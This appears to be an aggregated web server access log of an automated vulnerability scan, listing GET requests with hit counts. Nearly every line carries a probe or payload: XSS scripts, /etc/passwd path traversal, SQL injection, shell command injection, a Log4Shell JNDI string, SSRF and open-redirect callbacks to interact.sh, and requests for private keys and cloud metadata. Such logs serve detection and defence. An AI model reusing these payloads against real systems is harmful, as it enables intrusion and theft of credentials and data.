1 GET /apps.tidy.infinity.json HTTP/1.1
1 GET /appsettings.json HTTP/1.1
1 GET /appspec.yml HTTP/1.1
1 GET /apt/v1/context HTTP/1.1
1 GET /arsys/shared/login.jsp HTTP/1.1
1 GET /assets/.gitignore HTTP/1.1
1 GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1
1 GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1
1 GET /assets/elFinder/elfinder.html HTTP/1.1
1 GET /atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /auth/login HTTP/1.1
1 GET /auth/logout?continue=//interact[.]sh HTTP/1.1
1 GET /auth/realms/master/protocol/openid-connect/auth?client_id=security-admin-console&nonce=cfx&redirect_uri=valid&request_uri=http[:]///&response_type=code&scope=openid&state=cfx HTTP/1.1
1 GET /auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
1 GET /authentication HTTP/1.1
1 GET /authenticationserverservlet HTTP/1.1
1 GET /autodiscover/autodiscover.json/v1.0/2LM9clVzpUSFhL7uAWMZj8vzFTO@interact.sh?Protocol=Autodiscoverv1 HTTP/1.1
1 GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1
1 GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1
1 GET /awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
1 GET /axis/ HTTP/1.1
1 GET /axis/happyaxis.jsp HTTP/1.1
1 GET /axis2-web/HappyAxis.jsp HTTP/1.1
1 GET /axis2/axis2-web/HappyAxis.jsp HTTP/1.1
1 GET /b/l.e HTTP/1.1
1 GET /backend/admin/common/clearcache?previousUrl=http[:]//www[.]interact[.]sh HTTP/1.1
1 GET /backend/backend/auth/signin HTTP/1.1
1 GET /backend/elfinder/elfinder-cke.html HTTP/1.1
1 GET /backupsettings.dat HTTP/1.1
1 GET /bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
1 GET /bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script> HTTP/1.1
1 GET /bin.tidy.infinity.json HTTP/1.1
1 GET /bin/querybuilder.feed.servlet HTTP/1.1
1 GET /bin/querybuilder.feed HTTP/1.1
1 GET /bin/querybuilder.json.servlet HTTP/1.1
1 GET /bin/querybuilder.json HTTP/1.1
1 GET /bin/wcm/search/gql.json/a.1.json?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET /bin/wcm/search/gql.json/a.css?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET /bin/wcm/search/gql.json/a.html?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET /bin/wcm/search/gql.json/a.ico?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET /bin/wcm/search/gql.json/a.png?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET /bin/wcm/search/gql.json;%250aa.css?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET /bin/wcm/search/gql.json;%250aa.html?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET /bin/wcm/search/gql.json;%250aa.ico?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET /bin/wcm/search/gql.json;%250aa.js?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET /bin/wcm/search/gql.json;%250aa.png?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET /bin/wcm/search/gql.json?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET /bin/wcm/search/gql.servlet.json?pathPrefix&query=type:base%20limit:..1 HTTP/1.1
1 GET /bitbucket-pipelines.yml HTTP/1.1
1 GET /bitbucket/repos?visibility=public HTTP/1.1
1 GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1
1 GET /blog/wp/readme.html HTTP/1.1
1 GET /boafrm/formWlanRedirect?redirect-url=http[:]//interact[.]sh&wlan_id=1 HTTP/1.1
1 GET /bolt/login HTTP/1.1
1 GET /booking.php?car_id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1
1 GET /bower.json HTTP/1.1
1 GET /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/ HTTP/1.1
1 GET /c42api/v3/LoginConfiguration?url=https[:]//localhost&username=${jndi:ldap://${hostName}./test} HTTP/1.1
1 GET /caches HTTP/1.1
1 GET /cacti/ HTTP/1.1
1 GET /calendar/calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1
1 GET /carbon/admin/login.jsp?errorCode=%27)alert(document.domain)//&loginStatus=false HTTP/1.1
1 GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F HTTP/1.1
1 GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
1 GET /cas/login HTTP/1.1
1 GET /ccmadmin/bulkvivewfilecontents.do?fileName=../../../../../../../../../../../../../../../../etc/passwd&filetype=samplefile HTTP/1.1
1 GET /cf-scripts/scripts/ajax/package/cfajax.js HTTP/1.1
1 GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1
1 GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1
1 GET /cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1) HTTP/1.1
1 GET /cgi-bin/GetSrvInfo.exe HTTP/1.1
1 GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1
1 GET /cgi-bin/cgi HTTP/1.1
1 GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
1 GET /cgi-bin/luci/ HTTP/1.1
1 GET /cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1 HTTP/1.1
1 GET /cgi-bin/luci HTTP/1.1
1 GET /cgi-bin/mesh.cgi?key=%27wget+http[:]//%27&page=upgrade HTTP/1.1
1 GET /cgi-bin/nagios3/status.cgi HTTP/1.1
1 GET /cgi-bin/nagios4/status.cgi HTTP/1.1
1 GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1
1 GET /cgi-bin/printenv HTTP/1.1
1 GET /cgi-bin/sqwebmail HTTP/1.1
1 GET /cgi-bin/stats HTTP/1.1
1 GET /cgi-bin/test/test.cgi HTTP/1.1
1 GET /cgi-bin/test HTTP/1.1
1 GET /cgi-bin/touchlist_sync.cgi?IP=wget+http[:]// HTTP/1.1
1 GET /cgi-bin/webmail HTTP/1.1
1 GET /cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth HTTP/1.1
1 GET /cgi-bin/welcome HTTP/1.1
1 GET /cgi/get_param.cgi?sys.passwd&sys.su.name&xml HTTP/1.1
1 GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1
1 GET /check_mk/login.py HTTP/1.1
1 GET /clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module HTTP/1.1
1 GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /client/ HTTP/1.1
1 GET /client/index.html HTTP/1.1
1 GET /client/index.php HTTP/1.1
1 GET /clientaccesspolicy.xml HTTP/1.1
1 GET /clock_status.php?current_page=http[:]//interact[.]sh HTTP/1.1
1 GET /cloudexp/application/configs/application.ini HTTP/1.1
1 GET /cluster/cluster HTTP/1.1
1 GET /clusters HTTP/1.1
1 GET /cms/application/configs/application.ini HTTP/1.1
1 GET /comm.php?id=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /command.cgi?cat%20/etc/passwd HTTP/1.1
1 GET /common_page/login.html HTTP/1.1
1 GET /components/com_ionfiles/download.php?download=1&file=../../../../../../../../etc/passwd HTTP/1.1
1 GET /composer.json HTTP/1.1
1 GET /composer.lock HTTP/1.1
1 GET /compress.php?file=../../../../../../../etc/passwd HTTP/1.1
2 GET /computeMetadata/v1/project/ HTTP/1.1
1 GET /concerto/Login?goto=Central HTTP/1.1
1 GET /conf HTTP/1.1
1 GET /config.html HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /config.ru HTTP/1.1
1 GET /config/databases.yml HTTP/1.1
1 GET /config/error_log HTTP/1.1
1 GET /config/initializers/secret_token.rb HTTP/1.1
1 GET /config/jwt/private.pem HTTP/1.1
1 GET /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
1 GET /config/properties.ini HTTP/1.1
1 GET /config/user.xml HTTP/1.1
1 GET /confluence/plugins/servlet/oauth/view-consumer-info HTTP/1.1
1 GET /confluence HTTP/1.1
1 GET /console-selfservice/SelfService.do HTTP/1.1
4 GET /console/ HTTP/1.1
1 GET /console/login/LoginForm.jsp HTTP/1.1
1 GET /content.infinity.json HTTP/1.1
1 GET /content/..;/crx/packmgr/list.jsp;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250aa.css?_charset_=utf-8&_dc=1615863080856&includeVersions=true HTTP/1.1
1 GET /control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E HTTP/1.1
1 GET /controlplane HTTP/1.1
1 GET /core/auth/login/ HTTP/1.1
1 GET /core/config/databases.yml HTTP/1.1
1 GET /cp/Shares?protocol=webaccess&user&v=2.3 HTTP/1.1
1 GET /crossdomain.xml HTTP/1.1
1 GET /crowd/console/login.action HTTP/1.1
1 GET /crx/packmgr/index.jsp HTTP/1.1
1 GET /crx/packmgr/list.jsp;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250a;%250aa.css?_charset_=utf-8&_dc=1615863080856&includeVersions=true HTTP/1.1
1 GET /css/eonweb.css HTTP/1.1
1 GET /cucm-uds/users HTTP/1.1
1 GET /cxwebclient/Login.aspx HTTP/1.1
1 GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1
1 GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1
1 GET /darkstat/ HTTP/1.1
1 GET /dashboard.aspx HTTP/1.1
1 GET /dashboard.html HTTP/1.1
1 GET /dashboard/ HTTP/1.1
1 GET /dashboardUser HTTP/1.1
1 GET /data?get=prodServerGen HTTP/1.1
1 GET /dataservice/disasterrecovery/download/token/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252Fetc%252Fpasswd HTTP/1.1
1 GET /db/server_import.php HTTP/1.1
1 GET /debug.cgi HTTP/1.1
1 GET /debug/pprof/ HTTP/1.1
1 GET /debug/pprof/goroutine?debug=1 HTTP/1.1
1 GET /demo/file/../../../../../../../../etc/passwd%2500filename.mp4/chunk.m3u8?nimblesessionid=1484448 HTTP/1.1
1 GET /deployment-config.json HTTP/1.1
1 GET /devel/iface/ HTTP/1.1
1 GET /dms/admin/accounts/payment_history.php?account_id=2%27 HTTP/1.1
1 GET /doc/CHANGELOG.txt HTTP/1.1
1 GET /doc/README.txt HTTP/1.1
1 GET /docker-compose.override.yml HTTP/1.1
1 GET /docker-compose.production.yml HTTP/1.1
1 GET /docker-compose.staging.yml HTTP/1.1
1 GET /docs HTTP/1.1
1 GET /document.php?file=../../../../../../../etc/passwd&modulepart=project HTTP/1.1
1 GET /dokuwiki/doku.php?at=<svg%20onload=alert(document.domain)>&id=wiki:welcome HTTP/1.1
1 GET /dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1
1 GET /download.do?file=../../../../config.text HTTP/1.1
1 GET /download.php?file=../../../../../etc/passwd HTTP/1.1
1 GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /download?file=passwd&type=Files&working_dir=%2F../../../../../../../../../../../../../../../../../../../etc HTTP/1.1
1 GET /download?filename=../../../../../../../../etc/passwd&type=files HTTP/1.1
1 GET /downloader/ HTTP/1.1
1 GET /druid/login.html HTTP/1.1
1 GET /dumpmdm.cmd HTTP/1.1
1 GET /dwr/index.html HTTP/1.1
2 GET /dynamic/instance-identity/document HTTP/1.1
1 GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1
1 GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1
1 GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
1 GET /editor/ckeditor/samples/ HTTP/1.1
1 GET /editor/ckeditor/samples/sample_posteddata.php HTTP/1.1
1 GET /elfinder/php/connector.minimal.php?cmd=file&download=1&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64> HTTP/1.1
1 GET /em/console/logon/logon HTTP/1.1
1 GET /embed.js HTTP/1.1
1 GET /emswebclient/Login.aspx HTTP/1.1
1 GET /en-US/account/login HTTP/1.1
1 GET /enginemanager/server/logs/download?logName=../../../../../../../../etc/passwd&logSource=engine&logType=error HTTP/1.1
1 GET /env.dev.js HTTP/1.1
1 GET /env.js HTTP/1.1
1 GET /env.prod.js HTTP/1.1
1 GET /env.production.js HTTP/1.1
1 GET /env.test.js HTTP/1.1
1 GET /error.log HTTP/1.1
1 GET /error.php?SERVER_NAME=<script>alert(document.domain)</script> HTTP/1.1
1 GET /error/error.log HTTP/1.1
1 GET /error_log.txt HTTP/1.1
1 GET /errors.log HTTP/1.1
1 GET /errors.txt HTTP/1.1
1 GET /errors/errors.log HTTP/1.1
1 GET /etc/acs-commons/jcr-compare.html HTTP/1.1
1 GET /etc/acs-commons/version-compare.html HTTP/1.1
1 GET /etc/groovyconsole.html HTTP/1.1
1 GET /etc/importers/bulkeditor.html HTTP/1.1
1 GET /etc/linkchecker.html HTTP/1.1
1 GET /etc/reports/diskusage.html?path=/content/dam HTTP/1.1
1 GET /etc/reports/diskusage.html HTTP/1.1
1 GET /explorer.html HTTP/1.1
11 GET /favicon.ico HTTP/1.1
1 GET /fcgi-bin/echo HTTP/1.1
1 GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1
1 GET /features HTTP/1.1
1 GET /filemanager/ajax_calls.php?action=get_file&file=../../../../etc/passwd&preview_mode=text&sub_action=preview&title=source HTTP/1.1
1 GET /files/ldap.debug.txt HTTP/1.1
1 GET /find_v2/_click?_t_hit.id&_t_id&_t_q&_t_redirect=https[:]//interact[.]sh HTTP/1.1
1 GET /finish-installation/register HTTP/1.1
1 GET /flyway HTTP/1.1
1 GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
1 GET /forum/phpmyadmin/ HTTP/1.1
1 GET /forum/phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini HTTP/1.1
1 GET /fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1
1 GET /fpui/jsp/index.jsp HTTP/1.1
1 GET /ftb.imagegallery.aspx HTTP/1.1
1 GET /ftpsync.settings HTTP/1.1
1 GET /fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /gallery/zp-core/setup/index.php HTTP/1.1
1 GET /gateway HTTP/1.1
1 GET /gespage/webapp/login.xhtml HTTP/1.1
1 GET /git/notifyCommit?branches=2LM9b6dQe7ZCIRZqWVcXWkPjZLr&url=2LM9b6dQe7ZCIRZqWVcXWkPjZLr HTTP/1.1
1 GET /global-protect/login.esp?user=j%22-alert(1)-%22x HTTP/1.1
1 GET /glpi/ HTTP/1.1
1 GET /glpi/ajax/telemetry.php HTTP/1.1
1 GET /go/add-on/business-continuity/api/cipher.aes HTTP/1.1
1 GET /go/auth/login HTTP/1.1
1 GET /goanywhere/auth/Login.xhtml HTTP/1.1
1 GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1
1 GET /graph_realtime.php?action=init HTTP/1.1
1 GET /graph HTTP/1.1
1 GET /graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+} HTTP/1.1
1 GET /groovyconsole HTTP/1.1
1 GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1
1 GET /h2-console/login.jsp HTTP/1.1
1 GET /happyaxis.jsp HTTP/1.1
1 GET /help/admin-guide/test.jsp HTTP/1.1
1 GET /help/english/index.html?javascript:alert(document.domain) HTTP/1.1
1 GET /him/api/rest/V1.0/system/log/list?filePath=../ HTTP/1.1
1 GET /home.html HTTP/1.1
1 GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&redirect=https[:]//interact[.]sh/&status=1 HTTP/1.1
1 GET /homepage.nsf HTTP/1.1
1 GET /horde/admin/user.php HTTP/1.1
1 GET /host-manager/html HTTP/1.1
1 GET /html/common/forward_js.jsp?FORWARD_URL=http[:]//www[.]interact[.]sh HTTP/1.1
1 GET /html/index.html HTTP/1.1
1 GET /html/log HTTP/1.1
1 GET /html/login.html HTTP/1.1
1 GET /html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh HTTP/1.1
1 GET /html/setup.html HTTP/1.1
1 GET /http[:]//13[.]67[.]44[.]234/HelpTheHelpDesk.jsdbx HTTP/1.1
1 GET /hub HTTP/1.1
1 GET /hue/accounts/login?next=/ HTTP/1.1
1 GET /hybris/hmc/hybris HTTP/1.1
1 GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20%22%29%7D__::.x/ HTTP/1.1
1 GET /iNotes/Forms6.nsf HTTP/1.1
1 GET /iNotes/Forms85.nsf HTTP/1.1
1 GET /iPages/i_login.asp HTTP/1.1
1 GET /iam/login HTTP/1.1
1 GET /ibmmq/console/login.html HTTP/1.1
1 GET /icons/.%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
1 GET /icons/ HTTP/1.1
1 GET /id_dsa HTTP/1.1
1 GET /id_rsa HTTP/1.1
1 GET /identification.php HTTP/1.1
1 GET /ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /images/..%252fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1
2 GET /images/..%252finfo.html HTTP/1.1
1 GET /img.php?f=/./etc/./passwd HTTP/1.1
1 GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F%60 HTTP/1.1
1 GET /include/thumb.php?dir=http\\..\\admin\\login\\login_check.php HTTP/1.1
1 GET /includes/.gitignore HTTP/1.1
1 GET /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1
1 GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1
1 GET /index.asp HTTP/1.1
1 GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /index.do HTTP/1.1
1 GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
1 GET /index.php/Home/login/index.html HTTP/1.1
1 GET /index.php/Home/uploadify/fileList?path=../../../&type=.+ HTTP/1.1
1 GET /index.php/System/MailConnect/host//port/80/secure/ HTTP/1.1
1 GET /index.php/bbs/index/download?local=1&name=1.txt&url=/etc/passwd HTTP/1.1
1 GET /index.php/component/chronoforums2/profiles/avatar/u1?av=../../../../../../../etc/passwd&tvout=file HTTP/1.1
1 GET /index.php/component/jemessenger/box_details?dw_file=../../.././../../../etc/passwd&task=download HTTP/1.1
1 GET /index.php/install/ HTTP/1.1
1 GET /index.php/install HTTP/1.1
1 GET /index.php/interact.sh HTTP/1.1
1 GET /index.php?%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&action=Login&module=Users&print=a HTTP/1.1
1 GET /index.php?Itemid=70&cid=1&option=com_cmimarketplace&viewit=/../../../../../../etc/passwd HTTP/1.1
1 GET /index.php?action=Login&module=Users HTTP/1.1
1 GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1
1 GET /index.php?auth=582f27d140497a9d8f048ca085b111df&c=api&m=data2&param=action=sql%20sql=%27select%20md5(999999999)%27 HTTP/1.1
1 GET /index.php?c=api&format=php&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&m=data2 HTTP/1.1
1 GET /index.php?content=../../../../../../../../etc/passwd HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../../../../../etc/passwd%00&option=com_picasa2gallery HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../../../etc/passwd%00&option=com_bfsurvey HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../../../etc/passwd%00&option=com_foobla_suggestions HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_addressbook HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_blogfactory HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_datafeeds HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_fabrik HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_gadgetfactory HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_hsconfig HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jinventory HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jprojectmanager HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jvideodirect HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_market HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_multimap HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_orgchart HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_perchafieldsattach HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_perchagallery HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_perchaimageattach HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_sweetykeeper HTTP/1.1
1 GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_ultimateportfolio HTTP/1.1
1 GET /index.php?controller=../../../../../../../etc/passwd%00&option=com_jashowcase&view=jashowcase HTTP/1.1
1 GET /index.php?controller=../../../../../../../etc/passwd%00&option=com_joomlaupdater HTTP/1.1
1 GET /index.php?controller=../../../../../../../etc/passwd%00&option=com_tweetla HTTP/1.1
1 GET /index.php?controller=../../../../../etc/passwd%00&option=com_joomlapicasa2 HTTP/1.1
1 GET /index.php?controller==../../../../../../../../../../etc/passwd%00&option=com_preventive HTTP/1.1
1 GET /index.php?controller=CommentGrade&fc=module&id_products%5B%5D=(select*from(select(sleep(6)))a)&module=productcomments HTTP/1.1
1 GET /index.php?controller=prevsell&dflink=../../../configuration.php&option=com_picsell&task=dwnfree HTTP/1.1
1 GET /index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /index.php?data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==&r=test/sss HTTP/1.1
1 GET /index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1 HTTP/1.1
1 GET /index.php?folder=../../../../../../../../../../../../../../../tmp/&g=element&method=onAjax_files&option=com_fabrik&plugin=image&task=plugin.pluginAjax HTTP/1.1
1 GET /index.php?item_id=1&list[ordering]&list[select]=updatexml(0x23,concat(1,md5(999999999)),1)&option=com_contenthistory&type_id=1&view=history HTTP/1.1
1 GET /index.php?layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1)&option=com_fields&view=fields HTTP/1.1
1 GET /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1
1 GET /index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /index.php?option=com_rsfiles&path=../../../../../../../../../etc/passwd&task=files.display HTTP/1.1
1 GET /index.php?page=....//....//windows/win.ini HTTP/1.1
1 GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /index.php?page=windows/win.ini%00 HTTP/1.1
1 GET /index.php?r=installer/welcome HTTP/1.1
1 GET /index.php?rest_route=/whm/v3/themesettings HTTP/1.1
1 GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1
1 GET /index.php?route=account/login HTTP/1.1
1 GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1
1 GET /index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E HTTP/1.1
3 GET /index.php HTTP/1.1
1 GET /inormalydonotexist HTTP/1.1
1 GET /install.php HTTP/1.1
1 GET /install/ HTTP/1.1
1 GET /install/includes/configure.php HTTP/1.1
1 GET /install/index.php HTTP/1.1
1 GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1
1 GET /install HTTP/1.1
1 GET /installer-log.txt HTTP/1.1
1 GET /installer HTTP/1.1
1 GET /interface/login/login.php?site=default HTTP/1.1
1 GET /ioncube/loader-wizard.php HTTP/1.1
1 GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1
1 GET /irj/go/km/navigation/ HTTP/1.1
1 GET /irj/portal HTTP/1.1
1 GET /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f HTTP/1.1
1 GET /jasperserver/login.html?error=1 HTTP/1.1
1 GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1
1 GET /jira/secure/Dashboard.jspa HTTP/1.1
1 GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1
12 GET /jmx-console/ HTTP/1.1
1 GET /jobmanager/logs/..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252fetc%25252fpasswd HTTP/1.1
1 GET /jolokia/list HTTP/1.1
1 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1
1 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1
1 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1
1 GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1
1 GET /jolokia/read/java[.]lang:type=Memory HTTP/1.1
1 GET /jolokia HTTP/1.1
1 GET /js/zimbraMail/share/model/ZmSettings.js HTTP/1.1
1 GET /jsonapi/user/user HTTP/1.1
1 GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1
1 GET /jwt/private.pem HTTP/1.1
1 GET /karma.conf.js HTTP/1.1
1 GET /kb_view_customer.do?sysparm_article=KB00xxxx HTTP/1.1
1 GET /key.pem HTTP/1.1
1 GET /keycloak.json HTTP/1.1
1 GET /kfm/admin/ HTTP/1.1
1 GET /kfm/index.php HTTP/1.1
1 GET /knowage/servlet/AdapterHTTP?NEW_SESSION=TRUE&Page=LoginPage&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /labkey/__r1/login-login.view?returnUrl=http[:]//interact[.]sh HTTP/1.1
1 GET /language/lang HTTP/1.1
